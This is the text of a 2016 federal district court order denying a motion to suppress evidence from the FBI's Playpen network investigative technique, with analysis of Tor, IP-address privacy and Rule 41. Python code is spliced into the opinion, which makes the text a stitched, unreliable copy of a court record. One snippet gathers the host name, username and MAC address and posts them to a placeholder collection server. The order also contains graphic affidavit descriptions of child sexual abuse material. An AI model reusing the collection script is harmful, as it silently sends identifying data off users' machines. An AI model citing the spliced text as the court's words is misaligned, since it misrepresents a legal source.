United States v. Acevedo-Lemus

UNITED STATES DISTRICT COURT CENTRAL DISTRICT OF CALIFORNIA SOUTHERN DIVISION
Aug 8, 2016
Case No.: SACR 15-00137-CJC (C.D. Cal. Aug. 8, 2016)


Opinion

Case No.: SACR 15-00137-CJC

08-08-2016

UNITED STATES OF AMERICA, Plaintiff, v. JOSE ANTONIO ACEVEDO-LEMUS, Defendant.


ORDER DENYING DEFENDANT'S MOTION TO SUPPRESS

I. INTRODUCTION AND BACKGROUND

In December 2014, a foreign law enforcement agency advised the FBI that a known child pornography website called "Playpen" appeared to be associated with a United States-based IP address. (Dkt. 32 Ex. A at 6-37 ["Macfarlane Aff."] ¶ 28.) An ensuing investigation confirmed that Playpen was hosted by a server located in North Carolina. (Id.) The FBI obtained a search warrant for the location of the server in January 2015, seized the server, and found a copy of Playpen on it. (Id.)

"An IP address is a number that an Internet Service Provider assigns to devices that are connected to the Internet. . . . The Internet Service Provider to which an internet user subscribes can correlate the user's IP address to the user's true identity." Third Degree Films, Inc. v. John Does 1 through 4, No. 12-CV-1849 BEN (BSG), 2013 WL 3762625, at *1 (S.D. Cal. July 16, 2013).

Playpen operated as a "hidden service" located on an anonymity network known as "The Onion Router," or "Tor." (Macfarlane Aff. ¶¶ 6-7.) Ordinarily, public websites log the IP addresses of all visiting users. It is therefore an easy task for law enforcement to discover who has visited a certain website—or, alternatively, which websites a computer with a particular IP address has visited. The Tor network does not operate this way. Instead, to even access the network, a user must first download and install particular software, which subsequently shields the user's IP address by relaying it among "nodes"—computers run by volunteers all over the world. (Id. ¶ 8.) When a user visits a website located on the Tor network—like Playpen, for example—his actual IP address is not shown. Instead, Playpen can only see the IP address of the Tor "exit node"—the final relay computer which sent the user's communication to Playpen. (Id.) This deliberate concealment of IP addresses makes it exceptionally difficult for law enforcement to determine who has visited a website or hidden service located on the Tor network, as there is no practical way to trace a user's IP address back through the Tor nodes. (Id.)
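The practical effect of this relay scheme can be illustrated outside the record. The sketch below is hypothetical: it assumes a Tor client is running locally with its default SOCKS proxy on port 9050, that the third-party requests library is installed with SOCKS support (requests[socks]), and that https://example.com/ip is an invented service that simply echoes back the caller's apparent IP address. A direct request exposes the address assigned by the user's Internet service provider; the same request routed through the proxy exposes only the exit node's address.

```python
# Illustrative sketch only: compares the IP address a remote site observes
# for a direct connection versus one routed through a local Tor SOCKS proxy.
# Assumes Tor is listening on 127.0.0.1:9050 and that https://example.com/ip
# is a hypothetical endpoint that echoes back the caller's apparent IP address.
import requests

ECHO_URL = "https://example.com/ip"  # hypothetical IP-echo service

# Direct request: the site logs the IP address assigned by the user's ISP.
direct_ip = requests.get(ECHO_URL, timeout=10).text.strip()

# Same request routed through Tor: the site sees only the exit node's IP.
tor_proxies = {
    "http": "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}
tor_ip = requests.get(ECHO_URL, proxies=tor_proxies, timeout=30).text.strip()

print(f"IP seen on a direct connection: {direct_ip}")
print(f"IP seen through Tor (exit node): {tor_ip}")
```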

Once on the Tor network, a user must know a website's particular web address to visit it. (He may not, as on the traditional or "open" Internet, simply perform an Internet search for certain material, since websites on the Tor network are not indexed like websites on the open Internet.) (Macfarlane Aff. ¶ 10.) Tor users must obtain web addresses from each other, or by viewing Internet postings describing the content available on certain websites. (Id.) The Tor network contains a "hidden service" page that is dedicated to pedophilia and child pornography, and Playpen's web address is listed on that page. (Id.) It would be highly unusual for a user to stumble upon Playpen. He would first have to elect to download Tor software and access the "dark web," where Tor websites are hosted, and then he would be required to affirmatively locate Playpen's web address before reaching Playpen.

Users who entered Playpen's web address arrived at a main page which contained images of two partially clothed prepubescent females with their legs spread apart, along with text stating, "No cross-board reposts, .7z preferred, encrypt filenames, include preview, Peace out." (Macfarlane Aff. ¶ 12.) This text apparently referred to a ban on posting material from other message boards, an indication of which file compression method was preferable, and instructions on what to include with posted materials. (Id.) Adjacent to the text were fields for users to enter login credentials, and a hyperlink for new users to "register an account with Playpen." (Id.) Upon clicking the "register an account" hyperlink, users were taken to additional text which explained that Playpen required an email address but that rather than entering their real email address, users should simply enter a made-up address: "something that matches the xxx@yyy.zzz pattern." (Id. ¶ 13.) Users who successfully registered for the service by entering a false email address were then taken to a page containing Playpen's forums and subforums. (Id. ¶ 14.)

Playpen was entirely devoted to the publication and exchange of child pornography. Its forums, where Playpen users could post materials, bore titles such as "Jailbait Videos" (of both "Girls" and "Boys"), "Pre-teen Videos," "Pre-teen Photos," and "Webcams" (again, divided by gender), "Family Playpen - Incest," and "Toddlers." (Macfarlane Aff. ¶ 14.) Playpen also maintained a "Kinky Fetish" forum that included subforums like "Bondage," "Peeing," "Scat," "Spanking," "Voyeur," and "Zoo." (Id.) In addition to these forums and subforums, Playpen included three other important features. The first, called "Playpen Image Hosting," allowed Playpen users to upload links to images of child pornography. (Id. ¶ 23.) The links were then available to all registered Playpen users. (Id.) The second, "Playpen File Hosting," similarly allowed users to upload videos of child pornography, which were then available to registered Playpen users. (Id. ¶ 24.) The third, "Playpen Chat," permitted users to post links to child pornography for other users who were logged into Playpen Chat at the same time. (Id. ¶ 25.) The link to Playpen Chat was on Playpen's main index page. (Id.)

"Jailbait" refers to underage but post-pubescent minors.

The FBI's review of Playpen's forums and subforums, as well as its Playpen Image Hosting, Playpen File Hosting, and Playpen Chat features, revealed links to numerous depictions of what appeared to be child pornography. A representative sampling of those depictions is as follows:

• An image of a prepubescent or early pubescent female being orally penetrated by the penis of a naked male. (Macfarlane Aff. ¶ 18.)

• A video of a prepubescent female, naked from the waist down, being anally penetrated by the penis of a naked adult male. (Id. ¶ 18.)

• Images focused on the nude genitals of a prepubescent female. (Id. ¶ 23.)

• A video of an adult male masturbating and ejaculating into the mouth of a nude prepubescent female. (Id. ¶ 24.)

• An image of two prepubescent females lying on a bed with their genitals exposed. (Id. ¶ 25.)

• An image of four females, including at least two prepubescent females, performing oral sex on one another. (Id. ¶ 25.)

The FBI seized a copy of the server hosting Playpen in January 2015. (Macfarlane Aff. ¶ 28.) The nature of the Tor network, however, prevented the FBI from identifying Playpen users, since Playpen's "logs of member activity . . . contain[ed] only the IP addresses of Tor 'exit nodes' utilized by board users." (Id. ¶ 29.) Accordingly, on February 19, 2015, the FBI executed a court-authorized search at the Naples, Florida residence of the suspected administrator of Playpen. (Id. ¶ 30.) The administrator was apprehended, and the FBI managed to assume administrative control of Playpen. (Id.) The FBI then devised a plan to determine the identities of Playpen users: it would, while running Playpen from a server in Virginia, reconfigure the website to deploy a network investigative technique ("NIT") any time a user downloaded content from Playpen. (Id. ¶ 33.) As Douglas Macfarlane, an FBI Special Agent, subsequently explained,

In the normal course of operations, websites send content to visitors. A user's computer downloads that content and uses it to display web pages on the user's computer. [Upon deployment of the NIT, Playpen,] which will be located in Newington, Virginia, . . . would augment that content with additional computer instructions. When a user's computer successfully downloads those instructions from [Playpen], the instructions, which comprise the NIT, are designed to cause the user's "activating" computer to transmit certain information to a computer controlled by or known to the government.
(Macfarlane Aff. ¶ 33.) Specifically, the NIT would reveal to the government seven items:
1. The activating computer's IP address, and the date and time that the NIT determined what that IP address was;

2. A unique identifier generated by the NIT to distinguish the data from that of other activating computers;

3. The type of operating system running on the computer;

4. Information about whether the NIT had already been delivered to the computer;
5. The activating computer's host name;

6. The activating computer's operating system username; and

7. The activating computer's Media Access Control ("MAC") address.
(Id. ¶ 34.)
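The affidavit describes the NIT only at this level of generality; the actual instructions are not part of the record. As a rough, hypothetical sketch of the reporting pattern described above (ordinary web content augmented with instructions that transmit identifying details to a server controlled by the investigators), the following Python fragment gathers roughly the categories listed in items 1 through 7 using only the standard library and posts them to a placeholder collection address. The endpoint, field names, and identifier scheme are all invented for illustration.

```python
# Hypothetical illustration of the reporting pattern the affidavit describes.
# This is not the FBI's NIT; the collection URL, identifier, and field names
# are invented for the sketch. It gathers roughly the seven categories listed
# above and posts them, as JSON, to a server controlled by the investigator.
import getpass
import json
import platform
import socket
import urllib.request
import uuid
from datetime import datetime, timezone

COLLECTION_URL = "https://investigator.example/collect"  # placeholder endpoint

payload = {
    # 1-2: timestamp and a unique identifier distinguishing this computer's data
    "timestamp": datetime.now(timezone.utc).isoformat(),
    "unique_id": str(uuid.uuid4()),
    # 3: type of operating system running on the computer
    "os_type": platform.platform(),
    # 4: whether the NIT had already been delivered (placeholder value)
    "already_delivered": False,
    # 5: host name of the activating computer
    "host_name": socket.gethostname(),
    # 6: operating system username
    "os_username": getpass.getuser(),
    # 7: MAC address of the active network interface
    "mac_address": f"{uuid.getnode():012x}",
}

# 1: the public IP address is observed server-side when this request arrives,
# since the machine itself may only know a private, router-assigned address.
request = urllib.request.Request(
    COLLECTION_URL,
    data=json.dumps(payload).encode("utf-8"),
    headers={"Content-Type": "application/json"},
)
urllib.request.urlopen(request, timeout=10)
```

Notably, under this pattern the activating computer's public IP address (item 1) would be observed by the receiving server when the transmission arrives, which is consistent with the observation, discussed below, that the IP address was "revealed in transit."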

On February 20, 2015, the FBI sought a warrant to deploy the NIT for thirty days. (Dkt. 32 Ex. A [the "NIT Warrant"].) The warrant application explained the nature of Playpen, the investigative difficulties presented by Playpen users' use of the Tor network, the operation of the NIT, and the fact that the NIT could cause activating computers—"wherever located"—to disclose the seven pieces of information noted above. (See generally Macfarlane Aff.; see also id. ¶ 48.) The warrant was signed by Theresa Carroll Buchanan, a United States Magistrate Judge for the Eastern District of Virginia. (NIT Warrant at 1.)

Deployment of the NIT revealed that a Playpen user with the username "DarkYogi" viewed at least 175 threads on Playpen while the NIT was active, including at least two threads containing files that appeared to the government to be child pornography. (Dkt. 32 Ex. C at 1-30 ["Wrathall Aff."] ¶ 26.) The first file depicts a nude white prepubescent girl with her mouth open and her hand on an adult male erect penis that appears to be ejaculating into the girl's mouth. (Id.) The second file contains a visual depiction of a female white toddler with no pants on being vaginally penetrated by the erect penis of an adult male. (Id.) The NIT acquired the IP address of the user's computer, which—a search of publicly available websites revealed—was operated by Time Warner Cable. (Id. ¶¶ 27-28.) In March 2015, the government served an administrative subpoena on Time Warner, which indicated that the IP address in question was assigned to Defendant Jose Acevedo at a residence in Anaheim, California. (Id. ¶ 29.) The FBI confirmed that Defendant indeed lived at the Anaheim address and then obtained a search warrant authorizing the search of Defendant's home for evidence of child pornography. (Id. ¶¶ 30-33; see generally id.) The FBI executed the search, interviewed Defendant, and seized a Hewlett Packard computer with a Western Digital hard drive and a SanDisk Cruzer thumb/flash drive. The hard drive and flash drive were found to contain 210 videos of child pornography and 31 still images of child pornography. A grand jury subsequently returned an indictment against Defendant for two counts of knowingly possessing child pornography. (See Dkt. 1.)

Defendant now moves for the suppression of all evidence stemming from the NIT Warrant. He argues that that warrant (1) violated the Fourth Amendment and (2) exceeded the magistrate's authority under Federal Rule of Criminal Procedure 41(b). (Dkt. 28.) The Court concludes that the FBI's acquisition of the key piece of information here—Defendant's IP address—was not a search under the meaning of the Fourth Amendment, and therefore did not require a warrant. The Court also concludes that in any event, suppression would not be an appropriate remedy for a Fourth Amendment violation in these circumstances. Accordingly, Defendant's motion is DENIED.

II. DISCUSSION

A. The NIT's Acquisition of Defendant's IP Address Was Not a Search

The Fourth Amendment to the U.S. Constitution provides that "[t]he right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated." "As a prerequisite to establishing the illegality of a search under the Fourth Amendment, a defendant must show that he had a reasonable expectation of privacy in the place searched." United States v. Heckencamp, 482 F.3d 1142, 1146 (9th Cir. 2007). A defendant may do so by demonstrating a "subjective expectation that his activities would be private [and that] his expectation was one that society is prepared to recognize as reasonable." United States v. Bautista, 362 F.3d 584, 589 (9th Cir. 2004). Defendant can do neither here.

1. Defendant Lacked a Subjective Expectation of Privacy in His IP Address Because He Routinely Disclosed It to Others

First, Defendant could not have had a subjective expectation that his IP address would remain private because he routinely disclosed it to third parties, including Time Warner, the Tor network, and websites he visited on the open Internet. "What a person knowingly exposes to the public, even in his own home or office, is not a subject of Fourth Amendment protection." Katz v. United States, 389 U.S. 347, 351 (1967). Applying this principle, the Ninth Circuit has on a number of occasions concluded that Internet users do not have reasonable expectations of privacy in their own IP addresses or the IP addresses of the websites they visit. See United States v. Forrester, 512 F.3d 500, 510 (9th Cir. 2007) ("Internet users have no expectation of privacy in the . . . IP addresses of the websites they visit because they should know that this information is provided to and used by Internet service providers for the specific purpose of directing the routing of information."); Heckencamp, 482 F.3d at 1148 (holding that a defendant had "no reasonable expectation of privacy" in "network logs" that contained his computer's IP address); United States v. Martinez, 588 Fed. Appx. 741 (Mem.) (9th Cir. 2014) (unpublished) ("The use by law enforcement of proprietary forensic software packages that revealed information, such as hash values and IP addresses, did not make the search unlawful, as there was no reasonable expectation of privacy in this information[.] It was available to others, even though they may not have known how to view it."). Multiple district courts that have entertained motions to suppress evidence stemming from the NIT Warrant are in accord. United States v. Matish, --- F. Supp. 3d ----, 2016 WL 3545776, at *21 (E.D. Va. June 23, 2016) (holding that the FBI "did not need to obtain a warrant before deploying the NIT" because the defendant had "no reasonable expectation of privacy in his IP address"); United States v. Werdene, --- F. Supp. 3d ----, 2016 WL 3002376, at III.B (E.D. Pa. May 18, 2016) (holding that because the defendant "did not have a reasonable expectation of privacy in his IP address, the NIT cannot be considered a 'search' within the meaning of the Fourth Amendment"); United States v. Michaud, Case No. 3:15-cr-05351-RJB, 2016 WL 337263, at *7 (W.D. Wash. Jan. 28, 2016) ("[The defendant] has no reasonable expectation of privacy of [sic] the most significant information gathered by deployment of the NIT, [his] assigned IP address[.]"); but see United States v. Darby, --- F. Supp. 3d ----, 2016 WL 3189703, at *6 (E.D. Va. June 3, 2016) (concluding that the NIT constituted a search, but noting that the government did not argue otherwise); United States v. Arterbury, Case No. 15-CR-182-JHP (N.D. Okla. Apr. 25, 2016) (report and recommendation) (concluding that the defendant had a reasonable expectation of privacy in his IP address because the government obtained the information from his computer, and not from a third party).

Although the NIT seized seven pieces of information, the parties apparently agree that the crucial piece of information was Defendant's IP address. The warrant to search Defendant's home makes clear that it was this information, not anything else identified by the NIT, that led the FBI to Defendant. (Wrathall Aff. ¶¶ 7, 27-33.) The search warrant did not rely on any of the other six pieces of information, and the Court will limit its analysis to the fruits of the IP address.

Two peculiar facts in this case—first, that the FBI obtained Defendant's IP address from his computer, not from a third party, and second, that Defendant attempted to obscure his IP address by using the Tor network—do not alter this conclusion.

First, it does not matter that the government procured Defendant's IP address from his computer as opposed to getting it from a third party because an IP address is not a private physical feature of a computer, but a commonly disclosed digital one assigned by a third party. When a consumer purchases a computer, takes it home, opens it up, and turns it on, that computer does not have an IP address. Instead, it is assigned an IP address by an internet service provider (like Time Warner) when it connects to a particular network, and that IP address may change if the computer connects to a different network. See Matish, 2016 WL 3545776, at *21 ("[The defendant's] IP address was not located on his computer, indeed, it appears that computers can have various IP addresses depending on the networks to which they connect."). It is not completely accurate to say that the government accessed Defendant's computer to retrieve his IP address, as the IP address is not a physical component of the computer. Instead, when Defendant downloaded content from Playpen, the government sent along some code that directed Defendant's computer to disclose to the government a feature of Defendant's connection—his IP address. Cf. id. at *21 ("[The defendant's] IP address was revealed in transit when the NIT instructed his computer to send other information to the FBI."). And—crucially—the FBI was only able to deploy the NIT to Defendant's computer after Defendant sought Playpen out. The FBI did not come looking for Defendant. Instead, it waited until he came to them and engaged in illicit activity by downloading content from Playpen. The government allowed him to download that content but also sent him home with an unexpected souvenir: code that would reveal his IP address.
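The point that an IP address is a property of the connection rather than of the machine can be illustrated with a short sketch (again, hypothetical and not part of the record): asking the operating system which local address it would use to reach an outside host returns a different answer on different networks, and the public-facing address that a website would log is assigned by the Internet service provider's equipment and is visible only to the remote end.

```python
# Illustrative sketch: the address reported here belongs to the current
# network connection, not to the computer's hardware. Connecting the same
# machine to a different network yields a different result.
import socket

def current_local_ip() -> str:
    """Return the local address the OS would use to reach an outside host."""
    # A UDP "connect" sends no packets; it only selects a route and source
    # address, so nothing actually leaves the machine.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect(("203.0.113.1", 80))  # documentation-range address; never contacted
        return s.getsockname()[0]

if __name__ == "__main__":
    print("Address assigned for this connection:", current_local_ip())
    # The public-facing IP address (what a website such as Playpen would log)
    # is assigned by the ISP's equipment and is visible only to the remote end.
```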

In that sense this case is very much like United States v. Knotts, 460 U.S. 276 (1983). There, the government—with a storeowner's consent—installed a "beeper" in a drum of chloroform subsequently purchased by an individual whom the government suspected of drug production. Id. at 277. After the drum was purchased and placed in the trunk of a vehicle, agents followed the vehicle, both maintaining visual contact and monitoring electronic signals from the beeper. Id. at 278. Eventually, the vehicle made "evasive maneuvers," and both visual and electronic contact were lost. Id. A helicopter with another monitor later picked up the signal, however, and tracked it to a cabin. Id. After performing additional surveillance of the cabin, the government obtained a residential search warrant, based in part on the electronic tracking of the chloroform drum. Id. The search revealed a drug lab, and the defendant moved to suppress, arguing that the tracking of the beeper was an unreasonable search.

The Supreme Court refused to suppress the evidence. It explained that the government had made "limited use" of the beeper, acquiring only information that the driver of the vehicle had "voluntarily conveyed" to the public—namely, the location of the vehicle and its ultimate destination. Id. at 281. (Nothing in the record indicated that the government had received or relied upon beeper signals after concluding that the "drum containing the chloroform had ended its automotive journey," id. at 284-85.) True, the "failure of visual surveillance" meant that the beeper gave law enforcement officials information they could not have acquired otherwise. Id. at 285. The crucial fact in the Supreme Court's view, however, was that the information law enforcement did acquire was ordinarily public, and "[n]othing in the Fourth Amendment prohibited the police from augmenting the sensory faculties bestowed upon them at birth with such enhancement as science and technology afforded them." Id. at 282. And although the Knotts Court warned that "dragnet type law enforcement practices" involving the use of beepers may present a more difficult constitutional question, it concluded that the government's monitoring of the beeper constituted neither a search nor a seizure under the meaning of the Fourth Amendment. Id. at 285.

Knotts was recently distinguished by United States v. Jones, where the Supreme Court ruled that the warrantless installation of a GPS tracker on a suspect's car was a search. 132 S. Ct. 945 (2012). That case was different from Knotts, the Supreme Court explained, in two ways. First, the beeper in Knotts was installed in the drum of chloroform before the drum came into the defendant's possession. In Jones, by contrast, the GPS device was installed on a car already owned and possessed by the defendant's wife. Jones, 132 S. Ct. at 952 (reasoning that "Jones, who possessed the Jeep at the time the Government trespassorily inserted the information-gathering device, [wa]s on much different footing" from the defendants in Knotts and another beeper case, United States v. Karo, 468 U.S. 705 (1984).) Second, the Jones Court noted the Knotts Court's emphasis on the "limited use" of the beeper, as well as its reservation of the constitutionality of warrantless "dragnet type law enforcement practices," see Knotts, 460 U.S. at 284. Jones, the Supreme Court said, involved a long-term, "dragnet-style" search and was therefore not a "limited use" case like Knotts. Jones, 132 S. Ct. at 952 n.6.

These two distinctions illustrate why Knotts, not Jones, is the correct analogue in this case. First, as in Knotts, the information-gathering technique used here was originally installed on something controlled by the government—Playpen content—and only then transferred to Defendant's computer, at Defendant's request. Defendant is therefore "on much different footing" than the defendant in Jones, 132 S. Ct. at 952, and instead is like the defendant in Knotts who unknowingly purchased the bugged chloroform. And second, the NIT obtained very limited information from Defendant's computer. It did not, for example, search for files containing child pornography or otherwise inspect the computer's contents. Indeed, its crucial operation was only to acquire a piece of information, normally public and often disclosed to third parties, that Defendant had managed to successfully obscure from the FBI: his IP address.

It also does not matter that Defendant tried to shield his IP address from the government, since he nonetheless disclosed that information to the initial Tor "entry node." As the Werdene court explained, "a necessary aspect of Tor is the initial transmission of a user's IP address to a third-party"—the operator of the initial Tor node—and the fact that a user's IP address is "subsequently bounced from node to node within the Tor network to mask his identity does not alter the analysis of whether he had an actual expectation of privacy in that IP address," which he had initially disclosed to a stranger. Werdene, 2016 WL 3002376, at III.A; see also United States v. Farrell, No. CR15-029RAJ, 2016 WL 705197, at *2 (W.D. Wash. Feb. 23, 2016) (holding that a defendant had no expectation of privacy in his IP address, which he concealed through Tor, because "in order for a prospective user to use the Tor network they must disclose information, including their IP addresses, to unknown individuals running Tor nodes"). Here again, Knotts is on point. Just as the Supreme Court would not countenance the possibility that the Knotts defendant's "evasive" driving maneuvers could permit him to escape law enforcement's technological tools, so too Defendant may not escape responsibility here merely because he managed to disclose his IP address to Tor but not to the government. That result was unacceptable more than thirty years ago in Knotts, and it is unacceptable today. Mere disclosure by a computer of its IP address—a hallmark of Internet communication—does not become a Fourth Amendment search when the government happens to be the party to whom disclosure occurs. Simply put, Defendant could not have had a subjective expectation of privacy in his IP address.

2. Society Does Not Recognize Defendant's Expectation as Reasonable

Defendant also cannot demonstrate that any subjective expectation of privacy he may have had in his IP address is an expectation that "society is prepared to recognize as 'reasonable,'" Katz, 389 U.S. at 361. Defendant opened his computer, got on the Internet, and went searching for child pornography. In an attempt to evade detection by law enforcement, he used Tor, hoping to mask his IP address from government investigators. American society abhors child pornography, and it does not view Defendant's deceptive efforts to conceal his viewing of child pornography as establishing a reasonable expectation of privacy. Werdene, 2016 WL 3002376, at III.B (noting that the defendant's "use of Tor to view and share child pornography is not only an activity that society rejects, but one that it seeks to sanction"); Matish, 2016 WL 3545776, at *24 ("Society thus is unprepared to recognize any privacy interests [the defendant] attempts to claim as reasonable in his search for pornographic material."); cf. Rakas v. Illinois, 439 U.S. 128, 143 n.12 (1978) ("[A] burglar plying his trade in a summer cabin during the off season may have a thoroughly justified subjective expectation of privacy, but it is not one which the law recognizes as 'legitimate.'"). Contrary to his assertions, Defendant cannot conceal his deviant behavior through Internet tricks. Werdene, 2016 WL 3002376, at III.B (rejecting the defendant's attempt to "serendipitously receive Fourth Amendment protection because he used Tor in an effort to evade detection"); Matish, 2016 WL 3545776, at *24 ("[The defendant] should not be rewarded for allegedly obtaining contraband through his virtual travel through interstate commerce on a Tor hidden service."). Indeed, this Court agrees with the Matish court that the government "should be able to use the most advanced technological means to overcome criminal activity that is conducted in secret." Matish, 2016 WL 3545776, at *24. Law enforcement cannot afford to be hamstrung by technologically creative criminals, especially when what is at risk is the sexual exploitation and sadistic abuse of children.

B. Suppression is Unwarranted in Any Event

Suppression would not be the proper remedy regardless of whether the FBI's deployment of the NIT was a search. "[S]uppression is not an automatic consequence of a Fourth Amendment violation. Instead, the question turns on the culpability of the police and the potential of exclusion to deter wrongful police conduct." Herring v. United States, 555 U.S. 135, 137 (2009). Defendant argues that the evidence stemming from the NIT Warrant must be suppressed because the NIT Warrant inappropriately authorized an out-of-district search of his computer. See Fed. R. Crim. P. 41(b) ("[A] magistrate judge with authority in the district . . . has authority to issue a warrant to search for and seize a person or property located within the district."). He is incorrect.

Defendant's alternative argument—that the NIT Warrant failed the Fourth Amendment's particularity requirement—is without merit. That argument has been rejected, as near as the Court can tell, by every federal court to consider it. See, e.g., Matish, 2016 WL 3545776, at *14 (finding that "the NIT Warrant did not violate the Fourth Amendment's particularity requirement" because "there existed a fair probability that anyone accessing Playpen possessed the intent to view and trade child pornography"); Michaud, 2016 WL 337263, at *5 ("Although the FBI may have anticipated tens of thousands of potential suspects as a result of deploying the NIT, that does not negate particularity, because it would be highly unlikely that [Playpen] would be stumbled upon accidentally, given the nature of the Tor network."); United States v. Epich, Case No. 15-CR-163-PP, 2016 WL 953269, at *2 (E.D. Wis. Mar. 14, 2016) (concluding that the NIT Warrant satisfied the particularity requirement because it "explained who was subject to the search, what information the NIT would obtain, the time period during which the NIT would be used, and how it would be used, as well as bearing attachments describing the place to be searched and the information to be seized").

1. Any Rule 41 Violation Does Not Require Suppression

In the Ninth Circuit, suppression is only available for Rule 41 violations if "1) the violation rises to a constitutional magnitude; 2) the defendant was prejudiced, in the sense that the search would not have occurred or would not have been so abrasive if law enforcement had followed the Rule; or 3) officers acted in intentional and deliberate disregard of a provision in the Rule." United States v. Weiland, 420 F.3d 1062, 1071 (9th Cir. 2005). For reasons the Court has already explained, no violation of "constitutional magnitude" has occurred here because Defendant had no reasonable expectation of privacy in his IP address. See Werdene, 2016 WL 3002376, at III.B ("Since [the defendant] did not have a reasonable expectation of privacy in his IP address, . . . the violation [of Rule 41] is therefore not constitutional."). Nor was Defendant prejudiced by any potential Rule 41 violation. After all, the FBI could have installed copies of Playpen in every judicial district in the country (there are 94) and then secured a corresponding number of Rule 41 warrants. It only chose not to do so because of the enormous burden and expense of such an undertaking. But the fact remains that the issuance of a modified NIT Warrant that fully complied with even a narrow reading of Rule 41 was entirely possible. Defendant's argument that he was prejudiced by this search boils down to an assertion that his consumption of child pornography was totally immunized by his use of Tor, and there was nothing the government could do about it. Not so.

Finally, there is no reason to believe that the FBI intentionally and deliberately violated Rule 41 by seeking the NIT Warrant. As an initial matter, there are credible arguments to be made that Rule 41 was never violated at all, casting doubt on Defendant's assertion that the FBI was knowingly flouting the Rule. Rule 41(b)(4), for example, provides that a magistrate judge may "issue a warrant to install within the district a tracking device" and that the warrant "may authorize use of the device to track the movement of a person or property located within the district, outside the district, or both[.]" It is not a stretch to say that the NIT functioned as a permissible "tracking device" attached to child pornography that was subsequently downloaded by Defendant when his computer sent a request to the Playpen server. Indeed, at least two district courts have agreed with this position. See Matish, 2016 WL 3545776, at *18 ("[T]he NIT Warrant authorized the FBI to install a tracking device on each user's computer when that computer entered the Eastern District of Virginia . . . [w]hen that computer left Virginia—when the user logged out of Playpen—the NIT worked to determine its location . . . all relevant events occurred in Virginia."); United States v. Darby, --- F. Supp. 3d ----, 2016 WL 3189703, at *12 (E.D. Va. June 3, 2016) (holding that Rule 41(b)(4) authorized the NIT Warrant because "[u]sers of Playpen digitally touched down in the Eastern District of Virginia" and the FBI was then entitled to install a tracking device); but see Michaud, 2016 WL 337263, at *6 (rejecting the argument that Rule 41(b)(4) permitted the NIT Warrant); United States v. Levin, --- F. Supp. 3d ----, 2016 WL 2596010, at *6 (D. Mass. May 5, 2016) (same). The fact that courts are presently divided over whether the NIT Warrant even violated Rule 41 is compelling evidence that the FBI did not intentionally and deliberately violate that Rule by seeking the warrant in the first instance.

Moreover, as the government points out, the Supreme Court has recently recommended that Rule 41 be modified to explicitly permit magistrate judges to "issue a warrant to use remote access to search electronic storage media and to seize or copy electronically stored information located within or outside that district if . . . the district where the media is located has been concealed through technological means." (Dkt. 38 Ex. B at 6.) Defendant takes this proposed amendment to mean that the FBI knew it was operating outside Rule 41. But the amendment actually cuts the other way. It would be strange indeed for the Court to suppress the evidence in this case in the face of a strong signal from the Supreme Court that Rule 41 should explicitly permit the issuance of warrants like the NIT Warrant. The severe penalty of suppression should not be levied against the government (and society generally) merely because the government had the good sense to seek an amendment to Rule 41.

2. The Good Faith Exception Applies

Even in the presence of a violation, the good faith exception to the exclusionary rule would bar suppression here. Application of the exclusionary rule is only appropriate in those "unusual cases" where suppression will "deter police misconduct." United States v. Leon, 468 U.S. 897, 916, 918 (1984). When police officers "acting with objective good faith ha[ve] obtained a search warrant from a judge or magistrate and acted within its scope," there is "no police illegality and thus nothing to deter." Id. at 920-21.

Traditional limitations on the exclusionary rule, like the good faith exception and the balancing of the costs of suppression against any violation, still apply in the Rule 41 context, since the suppression provisions of Rule 41 are "no broader than the constitutional rule," Alderman v. United States, 394 U.S. 165, 173 n.6 (1969).

Here, Defendant's technical sophistication meant that to adequately prosecute the child pornography laws, FBI agents were required to design a tool that was up to the task. The NIT was the solution. FBI agents were, at every juncture, up front with the magistrate judge about how the NIT worked, what it would seize from "activating computers," and where "activating computers" could be located. (Macfarlane Aff. ¶ 48.) That Rule 41 may not yet be a perfect fit for our technological world does not mean that the FBI agents here acted in bad faith.

The costs of suppression also weigh against that remedy in this case. Defendant proposes that he and other viewers and distributors of child pornography can escape capture and continue their viewing and distribution so long as they use Tor, while society and the children victimized by their behavior continue to suffer. That would be repugnant to justice and the purpose of law. As the Supreme Court has explained,

The [good faith] analysis must also account for the substantial social costs generated by the [exclusionary] rule. Exclusion exacts a heavy toll on both the judicial system and society at large. It almost always requires courts to ignore reliable, trustworthy evidence bearing on guilt or innocence. And its bottom-line effect, in many cases, is to suppress the truth and set the criminal loose in the community without punishment. Our cases hold that society must swallow this bitter pill when necessary, but only as a last resort. For exclusion to be appropriate, the deterrence benefits of suppression must outweigh its heavy costs.
Davis v. United States, 564 U.S. 229, 237 (2011) (internal citations and quotation marks removed). Considering the unspeakable harm caused by child pornography, and the creative and limited conduct of the FBI that was undertaken to mitigate that harm, the Court has no trouble concluding that suppression is entirely unwarranted here.

III. CONCLUSION

For the foregoing reasons, Defendant's motion to suppress is DENIED.

DATED: August 8, 2016

/s/_________

CORMAC J. CARNEY

UNITED STATES DISTRICT JUDGE

